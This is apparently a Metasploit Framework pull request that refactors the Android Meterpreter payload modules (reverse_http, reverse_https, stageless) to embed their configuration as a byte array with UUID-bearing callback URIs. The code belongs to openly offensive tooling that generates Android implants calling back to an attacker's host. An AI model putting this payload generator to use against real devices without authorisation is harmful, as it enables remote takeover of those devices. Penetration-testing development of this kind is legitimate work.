### PR TITLE
Refactor Android payload configuration into a byte array

### DIFF
--- a/lib/msf/core/payload/android.rb
+++ b/lib/msf/core/payload/android.rb
@@ -37,29 +37,15 @@ module Msf::Payload::Android
   end
 
   def apply_options(classes, opts)
-    timeouts = [
-      datastore['SessionExpirationTimeout'].to_s,
-      datastore['SessionCommunicationTimeout'].to_s,
-      datastore['SessionRetryTotal'].to_s,
-      datastore['SessionRetryWait'].to_s
-    ].join('-')
+    config = generate_config_bytes(opts)
     if opts[:stageless]
-      config = generate_config_hex(opts)
-      string_sub(classes, 'UUUU' + ' ' * 8191, 'UUUU' + config)
+      config[0] = "\x01"
     end
-    if opts[:ssl]
-      verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
-                                           datastore['HandlerSSLCert'])
-      if verify_cert_hash
-        hash = 'WWWW' + verify_cert_hash.unpack("H*").first
-        string_sub(classes, 'WWWW                                        ', hash)
-      end
-    end
-    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + payload_uri)
-    string_sub(classes, 'TTTT' + ' ' * 48, 'TTTT' + timeouts)
+
+    string_sub(classes, "\xde\xad\xba\xad" + "\x00" * 8191, config)
   end
 
-  def generate_config_hex(opts={})
+  def generate_config_bytes(opts={})
     opts[:uuid] ||= generate_payload_uuid
 
     config_opts = {
@@ -71,11 +57,11 @@ module Msf::Payload::Android
     }
 
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
-    config.to_b.unpack('H*').first
+    config.to_b
   end
 
   def string_sub(data, placeholder="", input="")
-    data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
+    data.gsub!(placeholder, input + "\x00" * (placeholder.length - input.length))
   end
 
   def sign_jar(jar)

--- a/modules/payloads/singles/android/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/android/meterpreter_reverse_http.rb
@@ -48,23 +48,10 @@ module MetasploitModule
   end
 
   def generate_jar(opts={})
+    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
+    opts[:uri] = generate_uri_uuid_mode(:connect, uri_req_len)
     opts[:stageless] = true
     super(opts)
-  end
-
-  def payload_uri(req=nil)
-    # Default URL length is 30-256 bytes
-    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
-    # Generate the short default URL if we don't know available space
-    if self.available_space.nil?
-      uri_req_len = 5
-    end
-
-    url = "http://#{datastore["LHOST"]}:#{datastore["LPORT"]}#{luri}"
-    # TODO: perhaps wire in an existing UUID from opts?
-    url << generate_uri_uuid_mode(:init_connect, uri_req_len)
-
-    url
   end
 
 end

--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -35,19 +35,10 @@ module MetasploitModule
     transport_config_reverse_http(opts)
   end
 
-  def payload_uri(req=nil)
-    # Default URL length is 30-256 bytes
+  def generate_config_bytes(opts={})
     uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
-    # Generate the short default URL if we don't know available space
-    if self.available_space.nil?
-      uri_req_len = 5
-    end
-
-    url = "http://#{datastore["LHOST"]}:#{datastore["LPORT"]}#{luri}"
-    # TODO: perhaps wire in an existing UUID from opts?
-    url << generate_uri_uuid_mode(:init_java, uri_req_len)
-
-    url
+    opts[:uri] = generate_uri_uuid_mode(:init_java, uri_req_len)
+    super(opts)
   end
 
 end

--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -28,25 +28,17 @@ module MetasploitModule
     ))
   end
 
-  def generate_jar(opts={})
-    opts[:ssl] = true
+  #
+  # Generate the transport-specific configuration
+  #
+  def transport_config(opts={})
+    transport_config_reverse_https(opts)
+  end
+
+  def generate_config_bytes(opts={})
+    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
+    opts[:uri] = generate_uri_uuid_mode(:init_java, uri_req_len)
     super(opts)
   end
-
-  def payload_uri(req=nil)
-    # Default URL length is 30-256 bytes
-    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
-    # Generate the short default URL if we don't know available space
-    if self.available_space.nil?
-      uri_req_len = 5
-    end
-
-    url = "https://#{datastore["LHOST"]}:#{datastore["LPORT"]}#{luri}"
-    # TODO: perhaps wire in an existing UUID from opts?
-    url << generate_uri_uuid_mode(:init_java, uri_req_len)
-
-    url
-  end
-
 
 end


### PR DESCRIPTION
This change refactors the Android payload to include a byte with the payload information using this structure:
https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Configuration
This means it's easier to pass things like the UUID to the Android payload.
@OJ this might help with the TLV refactor. If not I can close it and rebase on top of your changes.
Depends on: https://github.com/rapid7/metasploit-payloads/pull/134
